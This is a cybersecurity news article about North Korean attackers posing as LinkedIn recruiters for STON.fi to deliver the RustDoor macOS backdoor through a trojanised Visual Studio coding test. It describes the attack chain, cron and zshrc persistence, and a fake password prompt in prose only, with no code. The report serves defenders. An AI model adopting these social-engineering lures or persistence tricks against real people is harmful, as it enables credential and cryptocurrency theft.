Cybersecurity researchers continue to warn that North Korean threat actors are attempting to target potential victims on LinkedIn to deliver malware dubbed “RustDoor.”
The latest advisory comes from Jamf Threat Labs, which said it had discovered attempted attacks in which attackers contacted users on specialized social networks posing as recruiters for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.
This malicious cyber activity is part of a multi-faceted campaign waged by Democratic People’s Republic of Korea (DPRK)-backed cyber threat actors to infiltrate networks of interest under the pretext of interviews and coding jobs.
The financial and cryptocurrency sectors are among the top targets for state-sponsored adversaries seeking to generate illicit revenue and achieve an ever-changing set of objectives based on the regime’s interests.
These attacks, as the US Federal Bureau of Investigation (FBI) noted in a recent advisory, take the form of “highly customized and hard-to-detect social engineering campaigns” targeting employees of decentralized finance (“DeFi”), cryptocurrency, and similar businesses.
One notable sign of North Korean social engineering activity is a request to run code or download an application on a company-owned device or a device with access to a company’s internal network.
Another aspect worth mentioning is that such attacks also include “requests to conduct ‘pre-employment testing’ or debugging exercises that involve the execution of non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.”
Incidents featuring these tactics have been widely documented in recent weeks, highlighting the continued evolution of the tools used in these attack campaigns against targets.
In the latest attack chain discovered by Jamf, as part of a purported coding challenge, victims are tricked into downloading a booby-trapped Visual Studio project that contains an embedded bash command to download two different second-stage payloads with identical functionality: “VisualStudioHelper” and “zsh_env.”
This second stage malware is RustDoor, which the company tracks as Thiefbucket. At the time of writing, no anti-malware engines have flagged the packed coding test file as malicious. The file was uploaded to the VirusTotal platform on August 7, 2024.
“Configuration files embedded in two separate malware samples indicate that VisualStudioHelper persists via cron, and zsh_env persists via a zshrc file,” said researchers Jaron Bradley and Ferdous Saljooki.
RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 in connection with a malware campaign targeting cryptocurrency companies. Subsequent analysis by S2W uncovered a Go-language variant called GateDoor aimed at infecting Windows machines.
Jamf’s findings are significant not only because they mark the first time this malware has been formally attributed to a North Korean threat actor, but also because the malware was written in Objective-C.
VisualStudioHelper is designed to act as an information stealer by collecting files specified in its configuration, but only after prompting the user for their system password, disguising it as if it was sent from a Visual Studio app to avoid suspicion.
However, both payloads act as backdoors and use two different servers for command and control (C2) communications.
“Threat actors remain vigilant in finding new ways to target those in the crypto industry,” the researchers said. “It is important to educate employees, including developers, not to trust individuals who connect with them on social media and ask users to run any kind of software.”
“These social engineering schemes carried out by North Korea are carried out by people who are fluent in English and who research their targets before engaging in conversations.”
